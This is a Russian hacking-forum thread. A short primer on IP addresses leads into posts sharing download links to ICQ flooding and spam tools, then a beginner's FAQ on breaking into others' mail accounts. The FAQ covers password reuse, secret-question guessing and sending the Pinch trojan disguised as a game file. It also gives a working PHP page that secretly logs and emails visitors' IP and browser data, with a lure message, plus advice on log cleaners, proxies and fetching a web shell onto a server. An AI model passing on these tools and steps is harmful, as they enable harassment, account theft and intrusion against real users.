<!--coloro: yellow-->[color= yellow]<!--/coloro-->IP-адреса <!--colorc-->[/color]<!--/colorc-->представляют собой основной тип адресов, на основании которых сетевой уровень протокола IP передаёт пакеты между сетями. IP-адрес назначается администратором во время конфигурирования компьютеров и маршрутизаторов.
<!--coloro: yellow-->[color= yellow]<!--/coloro-->IP-адрес<!--colorc-->[/color]<!--/colorc--> состоит из двух частей: номера сети и номера узла. В случае изолированной сети её адрес может быть выбран администратором из специально зарезервированных для таких сетей блоков адресов (192.168.0.0/16, 172.16.0.0/12 или 10.0.0.0/. Если же сеть должна работать как составная часть Интернета, то адрес сети выдаётся провайдером либо pегиональным интернет-регистратором (Regional Internet Registry, RIR). Всего существует пять RIR: ARIN, обслуживающий Северную Америку; APNIC, обслуживающий страны Юго-Восточной Азии; AfriNIC, обслуживающий страны Африки; LACNIC, обслуживающий страны Южной Америки и бассейна Карибского моря; и RIPE NCC, обслуживающий Европу, Центральную Азию, Ближний Восток. Региональные регистраторы получают номера автономных систем и большие блоки адресов у ICANN, а затем выдают номера автономных систем и блоки адресов меньшего размера локальным интернет-регистраторам (Local Internet Registries, LIR), обычно являющихся крупными провайдерами.
Номер узла в протоколе IP назначается независимо от локального адреса узла. Маршрутизатор по определению входит сразу в несколько сетей. Поэтому каждый порт маршрутизатора имеет собственный IP-адрес. Конечный узел также может входить в несколько IP-сетей. В этом случае компьютер должен иметь несколько IP-адресов, по числу сетевых связей. Таким образом, IP-адрес характеризует не отдельный компьютер или маршрутизатор, а одно сетевое соединение.
<!--coloro: lime-->[color= lime]<!--/coloro-->
Классы IP-адресов<!--colorc-->[/color]<!--/colorc-->
Какая часть адреса относится к номеру сети, а какая — к номеру узла, определяется значениями первых бит адреса. Значения этих бит являются также признаками того, к какому классу относится тот или иной IP-адрес.
<!--coloro: green-->[color= green]<!--/coloro-->Бесклассовая адресация<!--colorc-->[/color]<!--/colorc-->
Со второй половины 90-х годов XX века классовая адресация повсеместно вытеснена бесклассовой адресацией, при которой количество адресов в сети определяется только и исключительно маской подсети.
<!--coloro: green-->[color= green]<!--/coloro-->Особые IP-адреса<!--colorc-->[/color]<!--/colorc-->
В протоколе IP существует несколько соглашений об особой интерпретации IP-адресов:
eсли весь IP-адрес состоит только из двоичных нулей, то он обозначает адрес того узла, который сгенерировал этот пакет; этот режим используется только в некоторых сообщениях ICMP;
eсли в поле номера сети стоят только нули, то по умолчанию считается, что узел назначения принадлежит той же самой сети, что и узел, который отправил пакет;
eсли все двоичные разряды IP-адреса равны 1, то пакет с таким адресом назначения должен рассылаться всем узлам, находящимся в той же сети, что и источник этого пакета. Такая рассылка называется ограниченным широковещательным сообщением (limited broadcast);
eсли в поле номера узла назначения стоят только единицы, то пакет, имеющий такой адрес, рассылается всем узлам сети с заданным номером сети. Например, в сети 192.190.21.0 с маской 255.255.255.0 пакет с адресом 192.190.21.255 доставляется всем узлам этой сети. Такая рассылка называется широковещательным сообщением (broadcast).
<!--coloro: lime-->[color= lime]<!--/coloro-->Динамические IP-адреса<!--colorc-->[/color]<!--/colorc-->
IP-адрес называют динамическим, если он назначается автоматически при подключении устройства к сети и используется в течение ограниченного промежутка времени, как правило, до завершения сеанса подключения.
Для получения IP-адреса клиент может использовать один из следующих протоколов:
DHCP (RFC 2131) — наиболее распространённый протокол настройки сетевых параметров.
BOOTP (RFC 951) — простой протокол настройки сетевого адреса, обычно используется для бездисковых станций.
IPCP (RFC 1332) в рамках протокола PPP (RFC 1661).
Zeroconf (RFC 3927) — протокол настройки сетевого адреса, определения имени, поиск служб.
<!--coloro: lime-->[color= lime]<!--/coloro-->Инструменты<!--colorc-->[/color]<!--/colorc-->
Под ОС Windows свой IP-адрес можно узнать, набрав ipconfig в командной строке.
Под ОС Unix свой IP-адрес можно узнать, набрав ifconfig в командной строке.

Kestrel
Активный участник
Сообщений: 3552
Зарегистрирован: 26 дек 2010, 12:22

Сообщение Kestrel » 30 мар 2009, 09:47

<span style="font-size: 18px"><!--coloro: red-->[color= red]<!--/coloro--><span style="display: block; text-align: center">Flood - spam ICQ<!--colorc-->[/color]<!--/colorc--></span></span>
<span style="display: block; text-align: center"><span style="font-size: 14px"><!--coloro: yellow-->[color= yellow]<!--/coloro-->(посвящается Ревану)<!--colorc-->[/color]<!--/colorc--></span>
</span> [img]/images/smilies/biggrin.gif[/img]
<span style="display: block; text-align: center"><!--coloro: aqua-->[color= aqua]<!--/coloro-->ICQFlooder by l-l00k<!--colorc-->[/color]<!--/colorc--></span>
Программа служит для флуда icq-номера недруга, работает без проксей. Больше 70 номеров лучше не загружать, иначе, когда все номера онлайн, будут сильные тормоза. Номера должны быть в формате uin;pass.
Добавлено:
    * Сделано 2 режима флуд-атаки.
    * All - режим, в котором раньше работал флудер, то есть шлет по сообщению от каждого активного номера, затем отдыхает таймаут, потом опять шлет.
    * One - режим, в котором флудер шлет одно сообщение, ждет таймаут, шлет еще одно сообщений и т.д.
    * Время теперь указывается в милисекундах.
    * Добавлена возможность обхода защиты от спама, достаточно поставить галочку на "Spam protection" и указать ответ на защитный вопрос, затем нажать на "Send"; каждый из номерков обойдет защиту, и после этого уже пойдет флуд.
    * Флудер теперь определяет номера с неправильными паролями (BAD).
<!--coloro: yellow-->[color= yellow]<!--/coloro-->Скачать:<!--colorc-->[/color]<!--/colorc-->
http://depositfiles.com/ru/files/x6a7eo2rj
<span style="display: block; text-align: center"><!--coloro: aqua-->[color= aqua]<!--/coloro-->ICQ flooder FBK3.0 private<!--colorc-->[/color]<!--/colorc--></span>
    * успешно грузит до 1000 номеров.
    * отображает, что пишут на номера флуда (обычно там: "Аааа! Перестаньте!...").
    * показывает, сколько сообщений точно получит жертва.
    * отсеивает сдохшие потоки.
    * показывает, сколько сообщений в секунду получает жертва.
    * регулируемая скорость загрузки номеров и скорость отправки сообщений.
    * отправляет текстовое сообщение.
    * отправляет шум (случайный набор байтов) указанной длины.
    * отправляет по строчке из текстового файла.
    * хорошор мучает пользователей QIP, если грузануть более сотни номеров и выставить интервал отправки 2000.
    * Написан с нуля на Visual Basic.
    * 50 номеров для флуда в комплекте (по желанию).
    * QIP валит!

<!--coloro: yellow-->[color= yellow]<!--/coloro-->Скачать: <!--colorc-->[/color]<!--/colorc-->
http://depositfiles.com/ru/files/vof91e4sl
<span style="display: block; text-align: center"> <!--coloro: aqua-->[color= aqua]<!--/coloro-->[Perl] Fl00d icq by C!klodoL<!--colorc-->[/color]<!--/colorc--></span>
Флудер icq, реализованный на Perl-e.
<!--coloro: yellow-->[color= yellow]<!--/coloro-->Скачать: <!--colorc-->[/color]<!--/colorc-->
http://depositfiles.com/ru/files/8s8ssrs16
<span style="display: block; text-align: center"><!--coloro: aqua-->[color= aqua]<!--/coloro-->ICQ flooder 0.6 Private<!--colorc-->[/color]<!--/colorc--></span>
[Возможности]:
    * Флудер ICQ интернет-пейджеров.
    * Работает шоколадно...
    * Возможно поставить время перерыва между сообщениями.
    * Возможность выбора сообщений - авторизация, простые сообщения и сообщения вида "Вас добавили" !!!
<!--coloro: yellow-->[color= yellow]<!--/coloro-->
Скачать: <!--colorc-->[/color]<!--/colorc-->
http://depositfiles.com/ru/files/vg22rvp6l
<span style="display: block; text-align: center"><!--coloro: aqua-->[color= aqua]<!--/coloro-->.B. Flooder version 0.2 (beta)<!--colorc-->[/color]<!--/colorc--></span>
Возможности:
    * Messege type.
    * Сообщение.
    * Авторизация.
    * "Вас добавили".
    * В авторизации отказано.
Files:
Загрузка из *.txt файлов:
    * uin;pass.
    * text.
Счетчик:
    * Отосланных сообщений.
    * Принятых сообщений.
    * Загруженных номеров.
Трей:
    * Сворачивание в трей.
Connect options:
    * Настройки подключения.
    * Flood options.
    * Connect pause.
    * Send pause.
    * Super flood.
<!--coloro: yellow-->[color= yellow]<!--/coloro-->Скачать: <!--colorc-->[/color]<!--/colorc-->
http://depositfiles.com/ru/files/u0cmhsv3b
<span style="display: block; text-align: center"><!--coloro: aqua-->[color= aqua]<!--/coloro-->IMtale 4.1.2<!--colorc-->[/color]<!--/colorc--></span>
Представляет из себя программу для рассылки сообщений по номерам icq. Программа работает на самом последнем протоколе icq. Отличительная особенность программы - простота в использовании и максимальная автоматизация рутинных задач рассылки по номерам icq. Программа сочетает в себе простоту и оптимальность. Вам не нужно ломать голову по поводу того, как можно найти больше пользователей, какие дополнительные параметры поиска указывать, а какие нет, как избежать различных серверных лимитов на отправку и поиск. Интеллектуальный алгоритм программы сам все предусматривает. Программа поддерживает русский и английский языки.
<!--coloro: yellow-->[color= yellow]<!--/coloro-->Скачать: <!--colorc-->[/color]<!--/colorc-->
http://depositfiles.com/ru/files/ra0o0eitq
<span style="display: block; text-align: center"><!--coloro: aqua-->[color= aqua]<!--/coloro-->OSCAR Flooder<!--colorc-->[/color]<!--/colorc--></span>
Поддерживает:
Отправку сообщений на...
    * Один номер.
    * Список.
    * Диапазон номеров.
Типы сообщений:
    * Обычное.
    * Запрос авторизации.
    * Отказ авторизации.
    * Одобрение авторизации.
    * url-сообщение.
    * "Вы добавлены".
<!--coloro: yellow-->[color= yellow]<!--/coloro-->Скачать: <!--colorc-->[/color]<!--/colorc-->
http://depositfiles.com/ru/files/4l6fubk91
<span style="display: block; text-align: center"><!--coloro: aqua-->[color= aqua]<!--/coloro-->Flisis-flooder.v2.8.1.with-proxy<!--colorc-->[/color]<!--/colorc--></span>
То же самое, что и выше, но только с проксями.
<!--coloro: yellow-->[color= yellow]<!--/coloro-->Скачать:<!--colorc-->[/color]<!--/colorc-->
http://rapidshare.com/files/28951623/Fl … -proxy.rar
<span style="display: block; text-align: center"><!--coloro: aqua-->[color= aqua]<!--/coloro-->Kyle Katarn Flooder<!--colorc-->[/color]<!--/colorc--></span>
Удобный и простой флудер/спамер, не требующий заливки на хост!
К сожалению, не может похвастаться тысячами сообщений в секунду, но потрепать нервы зафлуженному ламеру или устроить спам-рассылку по диапазону номеров позволит.
<!--coloro: yellow-->[color= yellow]<!--/coloro-->Скачать: <!--colorc-->[/color]<!--/colorc-->
http://www.rapidshare.ru/926296

Омега-Энвич
Активный участник
Сообщений: 1168
Зарегистрирован: 26 дек 2010, 12:22

Сообщение Омега-Энвич » 30 мар 2009, 11:36

А спамить пустотой умеет?

Kestrel
Активный участник
Сообщений: 3552
Зарегистрирован: 26 дек 2010, 12:22

Сообщение Kestrel » 30 мар 2009, 11:41

Энвич, "пустотой" спамить тоже можно - просто забей в текстовое сообщение кучу пробелов и копипасти "пустоту", пока не надоест.

Kestrel
Активный участник
Сообщений: 3552
Зарегистрирован: 26 дек 2010, 12:22

Сообщение Kestrel » 31 мар 2009, 20:28

<span style="font-size: 18px"><span style="display: block; text-align: center"><!--coloro: red-->[color= red]<!--/coloro-->ЧаВо для тех, кто решил стать кулхацкером [img]/images/smilies/biggrin.gif[/img] <!--colorc-->[/color]<!--/colorc-->
</span></span>
<span style="font-size: 16px"><!--coloro: aqua-->[color= aqua]<!--/coloro-->С чего начать.<!--colorc-->[/color]<!--/colorc--></span>
Я ничего не знаю, но хочу стать хакером. С чего начать?
Поверь, хочешь жить спокойно - лучше не начинать…
Но я все-таки очень хочу, что же делать?
Ну что ж, тогда стоит начать с того, что не задавать этот вопрос на форумах хацкерских сайтов.
Сперва определимся, кто такой хакер - это существо, у которого есть компьютер (ну это обязательно), две руки (одна для мышки, другая, конечно же, для пива/колы [Рэнд, не две руки для пива, а одна!]), голова (для наушников), и холодильник (ну пиво же не теплым пить!). Если у тебя все это есть, значит, у тебя есть все шансы стать настоящим хакером [img]/images/smilies/wink.gif[/img] Ах да, чуть не забыла, еще у хакера должен быть нестандартный образ мышления!
Зачем хакеру нестандартный образ мышления?

Все очень просто. Хакер на «ты» с компьютером и с Интернетом, а значит, не нуждается ни в чьей помощи – всю информацию он умеет находить в поисковых ресурсах. Если ты усвоишь эту простую истину, то сможешь быстро добиться успехов. Поверь, базы yandex.ru и google.ru содержат ответы на 90% вопросов, так что если не хочешь ждать несколько дней ответа, используй это преимущество. В этом и есть их «маленький секрет», откуда они так много знают. И вообще не бойся быть оригинальным!
Эх.. а я такой ламер, что даже поисковиками пользоваться не умею.
Стоп. Ламер – только тот, кто ничего не делает. Помнишь про 90%? Никогда не забывай эту цифру. Заходим на yandex.ru, вводим запрос «Поиск информации с помощью поисковиков» и вуаля! – попадаем на страницу http://www.poiskinfo.net/stat/st1.php, где все подробно описано, как искать и где. Читай, и через 15 минут будешь специалистом по поиску в Сети. [img]/images/smilies/smile.gif[/img]

Но если все можно найти, зачем же тогда хацкерские форумы?

Во-первых, форум - это сообщество, люди, объединенные общими интересами. Они обсуждают все, начиная от погоды и заканчивая интересными взломами, но это не значит, что они с радостью будут разбираться с твоей проблемой.
Во-вторых, вспомни еще разок про 90%. Остается 10% вопросов, ответов на которые действительно пока нет в поисковиках, либо они так хорошо запрятаны, что ни за что не отыскать. Что ж, тогда у тебя есть все шансы задать свой вопрос первым. Раз он еще не встречался, скорей всего твои потомки, столкнувшиеся с такой же проблемой, будут попадать именно на твою тему. Поэтому постарайся задать его правильно.
Как же спросить правильно?
Замечательная статья про то, как задавать вопросы: http://ln.com.ua/~openxs/articles/smart … s-ru.html. Постарайся прочитать хотя бы ключевые моменты, это сильно повысит шанс, что тебе ответят и помогут.

Блин, а я вот спросил на форуме Античата, но мне не ответили даже через неделю. Да они там сами ничего не знают!!!

Значит, ты так и не прочитал эту замечательную статью: http://ln.com.ua/~openxs/articles/smart … s-ru.html. Потрать 10-15 минут, чтобы потом не терять дни… Поверь, оно стоит того.
Если же у тебя не получается даже это, давай не будем становиться хакерами, ок? [img]/images/smilies/smile.gif[/img]
Какие самые популярные сайты по взлому?
Вот некоторые из них:
http://antichat.ru
http://web-hack.ru
http://hackzona.ru
http://nsd.ru
http://void.ru
http://security.nnov.ru
http://anonymous.ru
http://inattack.ru
http://emanual.ru
http://sources.ru
http://codenet.ru
Кроме того, вот очень полезный сайт с доками по программированию: doks.gorodok.net
В Сети действительно много информации для новичков, но там столько терминов! Что такое сплойт, прокси, IP, дефейс и т.п.?
Во-первых, многие непонятные слова можно узнать тут: http://www.xakep.ru/magazine/xa/049/024/1.asp.
Кроме того, есть один универсальный способ: открываем yandex.ru и пишем там: "Что такое прокси". Кстати, ты сможешь познакомиться с зачатками искусственного интеллекта этого поисковика, увидев, как он преобразует твой запрос в «прокси – это…». Поэтому не стесняйся задавать ему вопросы типа «что такое …», он все знает. Пусть это будет наш секрет [img]/images/smilies/smile.gif[/img]
Какими необходимыми знаниями нужно обладать, чтобы стать хакером?
Во-первых, нужно здорово разбираться хотя бы в одной из операционных систем: Windows либо *nix.
Знать хотя бы основные shell-команды, причем как Windows, так и *nix.
Очень желательно знание одного из интерпретируемых языков, лучше всего PHP или perl.
Без знаний HTML, JavaScript, CSS придется очень туго.
Весьма пригодится умение писать Windows-программки. Соответственно, это C/C++, Delphi или Visual Basic.
Умение быстро находить интересующую тебя информацию в поисковиках будет несомненным плюсом.
Знание принципов функционирования компьютера, сетей и Интернета в целом.
Конечно, все это не охватить сразу, начни с чего-нибудь одного и осваивай постепенно. Со временем поймешь сам, что пригодится, а что нет.
Я слышал, что все хакеры не пользуются Windows это правда?
Не совсем. Дело в том, что большинство серверов - это unix-системы. Именно поэтому чем лучше ты будешь знать никсы, тем больше тебе будет «везти» во взломах. А самый лучший способ узнать систему – поставить ее себе на комп. Кроме того, Unix очень привлекателен эффективной работой с сетью. Некоторые технологии, успешно реализованные в никсах, Windows даже не поддерживает, в то время как отдельные программы вроде Corel Draw пока не имеют аналогов в *nix. Так что в какой ОС работать, это, в принципе, кому как удобней. Если есть желание познакомиться с каким-нибудь никсом, но не хочешь расставаться с Windows, то можешь оставить ее и поставить Linux как дополнительную ОС. Если заинтересовался, тебе прямая дорога на http://www.cnews.ru/reviews/articles/in … 30/188154.
<span style="font-style: italic"><span style="display: block; text-align: right">to be continued...</span></span>

Kestrel
Активный участник
Сообщений: 3552
Зарегистрирован: 26 дек 2010, 12:22

Сообщение Kestrel » 02 апр 2009, 10:25

Так, граждане юзвери, продолжаем разбирать FAQ для тех, кто решил стать ШурСтраКосом-кулхацкером =). ЧаВо скопированы с xakep.ru. На десятом вопросе мне надоело исправлять ашибки и очепятки, а также добавлять отсебятину, так что читайте, как есть. [img]/images/smilies/wink.gif[/img]. Успехов.
<span style="font-size: 16px"><!--coloro: aqua-->[color= aqua]<!--/coloro-->FAQ по взлому в Cети<!--colorc-->[/color]<!--/colorc-->
</span>
Как взломать мыло на mail.ru и yandex.ru?

Наверное, я тебя разочарую, но почту mail.ru или yandex.ru взломать нельзя. Почему?
http://mail.ru, пожалуй, самая популярная почтовая система. Администрация серверов mail.ru имеет огромные доходы с рекламы, они завлекают пользователей рекламой в печатных изданиях и по телевидению, и неужели ты думаешь, они пожалеют денег на хороших специалистов по безопасности? Забудь об этом. И, самое главное, никогда не ведись на предложения «взломать любое мыло на mail.ru за $5» - тебя самым наглым образом кинут. Способов дурачить лохов куча. Самый распространенный – «найден секретный почтовый робот, сообщающий пароль от любого ящика, если прислать ему свой пароль», также предлагают различные проги для взлома ящика «100% работающие и всего за $25».
Однако стоп, не все так печально. Что? Я говорю, почту на mail.ru нельзя взломать? Шутка [img]/images/smilies/smile.gif[/img]
Если нельзя найти баг в самом сервере, почему бы не найти его в голове владельца ящика? Итак, внимание, самые распространенные способы взлома почты на mail.ru. Само собой, они катят и для других почтовиков.
Что ж, приступим.
1. Первым делом стоит попробовать подобрать ответ на секретный вопрос. Вероятность мала, но попробовать стоит. К примеру, ответом на "любимое блюдо" чаще всего бывают "шашлык" или "пельмени".
2. Допустим, мыло vasya-pupkin@mail.ru. Ищешь в поисковиках (достаточно Яндекс, Гугл и Рамблер) все сайты, где он засветился, выписываешь все ники, под которыми он гуляет по Сети, и все сайты, на которых он зарегистрирован под этими никами. Конечно, если логин типа alex, то ничего не выйдет, нужен уникальный.
После этого исследуешь все найденные сайты. Если человек давно существует в Сети, более чем вероятно, что год-другой назад он зарегился со своим паролем на каком-нибудь superforum2.h14.ru, взломать который не составит большого труда. Пароль от аккаунта на форуме часто совпадает с паролем от мыла.
3. Отсылаем человеку троянца в надежде, что он ламер ушастый и клюнет на superFoto.jpg.............exe. Отослать можно запароленный архив csmaps.zip от имени его друга, сказав, что там новая крутая карта CS. Пароль указать в письме. Как правило, юзеры проверяют запароленный архив антивирем, а потом без палева открывают его и запускают exe-шник . Для этих целей вполне подойдет троян Pinch.
4. Допустим, ничего не помогло. Человек следит за мылом, меняет пароли и т.д.
Не все потеряно. Снова идем на страницу вспоминания пароля mail.ru и ищем, нет ли там ретрива пасса на мыло. Есть? Тогда можно попытаться узнать второе мыло и повторить всю процедурку сначала. Возможно, его человек охраняет не так ревностно.
Как взломать мыло на менее защищенных почтовиках: newmail, hotmail…?
1. Приятней всего найти багу самому, например, уязвимость в веб-интерфейсе: возможно, где-нибудь спряталась XSS или даже SQL-inj.
2. Если админы до сих пор не почесались сделать защиту от брута, можно попытаться сбрутить пароль. Для этого есть тулзы, например, старый добрый Brutus AET под Windows, либо THC-Hydra под никсы.
3. Использовать методы социнженерии, описанные для mail.ru.
Как взломать сервер ***? Вы же можете помочь?
Каждый взлом – процесс творческий. И каждый ломает так, как ему нравится. Но в первую очередь, конечно, стоит досконально изучить «подопытный» сервер. Какая на нем стоит система, какие сервисы, следит ли админ за патчами и обновлениями и т.д. При достаточном опыте хакер может узнать все это имея лишь браузер и telnet-клиент, начинающему же проще всего воспользоваться сканером уязвимостей. Например, SSS-сканером под Windows, или nmap под *nix.
Сканер нашел уязвимость и радостно сообщил об этом? Не торопись мчаться в скайп ШурСтраКосов с вопросом «nmap выдал мне ***, что с этим делать» - тебя скорей всего пошлют. Вбей ключевые слова из фразы об уязвимости в поисковик (лучше google).
Если же на сервере стоит старая бажная версия одного из сервисов, пробуй найти под нее сплойты.
Как пользоваться сплойтами?
Очень просто. Запустить сплойт с нужными параметрами, а он все сделает за тебя. Проблема в том, что большинство сплойтов в открытом доступе только в исходниках, то есть, обычный *.txt-файл с кодом на C++ или perl. Если это C++, то сплойт придется предварительно скомпилировать. Сплойты на perl или php компилировать не надо, они исполняются прямо на сервере. Если у тебя есть shell, достаточно залить туда файл и запустить. Если ничего кроме твоей родной Windows у тебя нет, придется скачать и установить один из эмуляторов. Например, cygwin и activePerl. Можно, в принципе, воспользоваться денвером (denwer.ru), но тогда тебе, скорей всего, придется вручную добавить некоторые сетевые библиотеки, которые отсутствуют в конфигурации по умолчанию.
Помни, что большинство сплойтов в исходниках имеют «защиту от дурака», то есть специально сделанные синтаксические ошибки, поэтому если в программировании ты абсолютный ноль, придется искать уже исправленный рабочий сплойт.

Как скомпилировать сплойт под Windows?

Ну очень подробное руководство приведено тут: http://www.razrushitel.front.ru/complite.html
Как запустить сплойт под Windows?
Нажми WinKey + R (или Пуск -> выполнить), там cmd и нажми ENTER. Появится черное окошко, в котором и надо запустить твой сплойт. Передвигаться по директориям можно командой "CD имя директории", перейти с диска C: на диск D: можно командой CD /D D:
Список всех файлов и папок можно получить командой DIR. Другие команды узнаешь, набрав HELP.

Как запустить сплойт на шелле? У меня не получается.

Как правило, справка по использованию сплойта выдается при запуске его без параметров или с параметрами –-help или -h.

Как взломать сайт?

Может быть, ты будешь расстроен, но нет ни чудо-проги lomalka_saitov.exe, ни заклинания «сайт, взломайся», ни слова, которое нужно ввести на сайте, чтобы он взломался. Даже сам Аль-Асвад не владеет Сферой Сайтоломания, несмотря на всю свою манч-крутость.
Опыт, знания и упорство – вот три кита, на которых держатся самые успешные взломы. Почитай описания уже совершенных взломов, которых в Сети просто до кучи, там все подробно описывается. Прочти 5-10 таких описаний, и получишь представление о том, как взломать сайт. Хотя бы примерно [img]/images/smilies/wink.gif[/img]
Могу лишь дать несколько рекомендаций:
    * Очень важно, на каком сервере находится сайт-цель. Возможно, админ не следит за сервером и вовремя не патчит систему. Тебе надо быть в курсе всех последних уязвимостей, чтобы сразу это заметить. Узнать информацию о сервере можно, например, на www.whois-service.ru.
    * Если это сервер крупной хостинг-компании, вроде valuehost, будь уверен - взломать сервер не получится, и натравливать сканер в надежде найти бажный сервис практически не имеет смысла. В этом случае разумней всего начать с поиска багов на самом сайте - возможно ошибку допустили программисты.
    * Начни с поиска установленных «сторонних» скриптов: форумов, чатов, гостевых и т.п. А может быть и сам сайт – это какой-нибудь публичный веб-портал вроде php-nuke. Тогда остается лишь узнать версию скрипта и проверить, не найдена ли в нем какая уязвимость.
Неплохая статья про взлом вебсайтов: www.hackzona.ru/hz.php?name=News&fi … p;sid=2045
Какие уязвимости чаще всего встречаются на сайтах?
Основные уязвимости - это, несомненно:
1. SQL-инъекции (SQL-injection).
SQL-инъекция относится к вставке метасимволов SQL в вводимые пользователем данные, что приводит к изменению запроса базе данных. Как правило, взломщики для начала определяют уязвимость сайта к такой атаке (для этого в форму или в один из параметров url посылается знак одинарной кавычки). Последствия выполнения такой атаки на уязвимом сайте могут находиться в пределах от появления детального сообщения об ошибке, что раскрывает злоумышленнику используемую на сайте технологию, до доступа к закрытым областям сайта или выполнения на сервере произвольных команд операционной системы.
2. Межсайтовый скриптинг (XSS).
Принцип работы межсайтового скриптинга основан на внедрении злонамеренного кода в HTML код страницы, что приводит к выполнению такого кода на машине жертвы, то есть броузером. Чаще всего применяется в гостевых книгах, чатах и форумах.
Также XSS представляет опасность, если произвольный код отображается на страницах с расширением shtml, т.е. сервер поддерживает технологию SSI (Server Side Includes). Это может привести к чтению или выполнению произвольных файлов на сервере.
3. Прочие баги в головах программистов [img]/images/smilies/wink.gif[/img]
Ошибки в самом сайте, из-за которых на сайте могут появиться серьезные бреши в безопасности. Например, адрес сайта содержит что-нибудь вроде «?file=», допустим site.ru?show.php&article=../index.asp, но, само собой, это лишь один из вариантов.
Как взломать ICQ?
Неплохой FAQ по ICQ-хакингу для начинающих приведен здесь:
http://www.web-hack.ru/articles/articles.php?go=13

Как узнать ip сервера, например yandex.ru?

Самый быстрый способ – набрать в командной строке «ping yandex.ru»
Ты увидишь что-нибудь вроде
64 bytes from 213.180.204.11: icmp_seq=0 ttl=41 time=60.988 ms
213.180.204.11 – это и есть ip-адрес сервера.
Как узнать ip юзера в сети?
1. Общаться с ним по аське. Многие icq-клиенты, такие как Miranda IM, SIM и т.п., показывают ip в информации о пользователе. Если не хотите качать продвинутые клиенты, можно воспользоваться специальными программами типа uin2ip, или патчами для стандартных версий ICQ.
Кроме того, на сайте www.leader.ru есть UIN Locator. Вводишь UIN получаешь IP, главное чтобы чел был не в оффлайне.
2. Добиться того, чтобы пользователь прислал тебе письмо. Вне зависимости от того, пользуется ли он веб-интерфейсом, или же почтовиком вроде TheBat!, в заголовках сообщения будет указан его ip. В TheBat! Заголовки можно прочитать, нажав правую кнопку и выбрать в контекстном меню «показывать заголовки RFC-822». Ищи текст «Received: from», который находится ближе всего к телу письма – сразу за этими словами будет ip-адрес отправителя.
3. Узнать на каких irc-каналах сидит юзер и посмотреть там.
4. Если ничего не помогает, но очень хочется, не отчаивайся.
Если у тебя есть хостинг, на котором можно исполнять perl/php (если нет, можно бесплатно зарегистрировать, например, на h15.ru), то вот еще один способ – выбираешь страничку, на которой есть фотография какого-нибудь случайного человека (допустим, http://masters.donntu.edu.ua/2001/ggeo/pavelchak/), полностью копируешь HTML-код в новый файл, например, info.html и сохраняешь его на своем сайте. Рядом создаешь еще один файл index.php, следующего содержания:

<div class="code-box"><strong class="legend">Код:</b><div class="blockcode"><div class="scrollbox" style="height: 35em"><pre><? $message = "Date: " . date("d.m.Y H:i:s") . "nIP: " . $REMOTE_ADDR . "nServer: " . gethostbyaddr($REMOTE_ADDR) . "nHTTP_X_FORWARDED_FOR: " . $HTTP_X_FORWARDED_FOR . "nPage: " . $SERVER_NAME . $REQUEST_URI . "nQuery: " . $QUERY_STRING . "nComing from: " . $HTTP_REFERER . "nBrowser: " . $HTTP_USER_AGENT . "nFilename: " . $SCRIPT_FILENAME; mail("admin@mail.ru", "Requested ip", $message, "From: admin@mail.runContent-Type: text/plain; charset=windows-1251", "-fadmin@mail.ru"); $ = fopen("log.txt", "a"); fwrite($fp, str_replace("n", "t", $message) . "n"); fclose($fp); include("fil.html");?></pre></div></div></div>Само собой, мыло admin@mail.ru необходимо заменить на твой почтовый ящик. Эта страничка (index.php) визуально не будет отличаться от оригинала, но логи с ip и параметрами системы юзера отошлются тебе на почту и продублируются в лог-файл (проверь, что у этого файла есть права на запись, например 666, или 777). Кроме того, если человек находится в локальной сети, ты получишь еще и его локальный ip, а если ходит через прокси, то поимеешь ip как прокси, так и его собственный.
Теперь твоя задача – заманить юзера на эту страничку. Само собой, не стоит просто присылать ее по аське. Мой любимый способ такой: «Привет [тут имя того, чей ip хочешь узнать], ты помнишь Таню ([а вот тут как раз линк на твою страничку с фоткой])? Она сказала, ты можешь помочь мне с дизайном (взломом, разведением кактусов и т.п).
Действует 100% [img]/images/smilies/smile.gif[/img]

Я знаю ip компьютера/юзера, как его взломать?

IP – это уникальный адрес компьютера. Так же как для рассылки корреспонденции у каждого жителя планеты должен быть уникальный домашний адрес (Страна, город, улица, дом, квартира), каждый компьютер должен иметь свой уникальный ip-адрес, чтобы другие компьютеры в сети смогли передать ему информацию.
Поэтому твой вопрос равносилен вопросу «как взломать квартиру друга, если я знаю его домашний адрес».
Надеюсь, ты понимаешь, что просто знание ip недостаточно.
Подробнее про ip-адрес, можно прочитать тут: http://www.sluh.freenet.kz/p8/12.html.

Как скрыть свой ip?

Если ты хочешь скрыть, т.е. поменять свой IP, то самый простой способ это сделать – воспользоваться анонимными прокси. Однако, не все так просто.
Обычно при обращении к сайту веб-серверу передаются два IP-адреса: REMOTE_ADDRESS и HTTP_X_FORWARDED_FOR.
REMOTE_ADDRESS – это, и есть твой ip-шник: по которому банят, который видят админы и т.п.
HTTP_X_FORWARDED_FOR - это дополнительный параметр, в котором хранится твой реальный IP. Например, если ты в локальной сетке, тут будет твой внутренний адрес.
Имей ввиду, что даже если если ты ходишь в сеть через прокси, и твой IP сменился на IP проксика, в HTTP_X_FORWARDED_FOR по-прежнему будет светиться твой старый IP!
Поэтому для полной анонимности нужно выбирать только те прокси, которые помечены как high anonymous или elite proxy. Эти сервера не передают никакой информации о твоем старом IP и полностью конфиденциальны. Если, конечно, это не сервера агентов спецслужб [img]/images/smilies/wink.gif[/img]
Как не спалиться при взломе?
Лазить по сети только через анонимные прокси, чтобы не светить свой ip. Заметать следы… Для этого используй какой-нибудь логклинер типа vanish2.

Где взять анонимные прокси и что с ними делать?

Списки анонимных прокси:
www.samair.ru/proxy
www.web-hack.ru/proxy
www.freeproxy.ru/ru
www.proxy4free.com
www.anonymizer.com
www.anonymizer.ru
Пара прокси-чекеров:
www.checker.freeproxy.ru/checker/
www.samair.ru/proxy/proxychecker/
Юзаем прокси так:
Опера: Инструменты -> Настройки (или сразу Ctrl+F12) -> Сеть -> Прокси-серверы. Пишем тут ip адрес и порт проксика, нажимаем OK. далее нажимаем F12 и ставим галочку около Enable Proxy Servers
IE: Сервис -> Свойства обозревателя -> Подключения->Настройка LAN
Если через проксик нужно пустить весь трафик, либо программу, которая не поддерживает настройку прокси-соединения (например, TheBat!), пользуйся SocksChain.

Что делать с паролем такого вида: d8578edf8458ce06fbc5bb76a58c5ca4?

Ну, во-первых, это не пароль, а md5-хеш от пароля. Расшифровать его проще всего прогой md5Inside, или ее более продвинутым вариантом PasswordsPro. Есть также консольная программка JohnTheRipper (JTR)

Как юзать JohnTheRipper (JTR)?

www.inattack.ru/search.php?s=john

Как юзать nmap?

www.inattack.ru/article/48
Как мне закачать что-нибудь на сервер?
lynx: lynx -source "yoursite.com/shells/shell.php" > shell.php
links: аналогично lynx
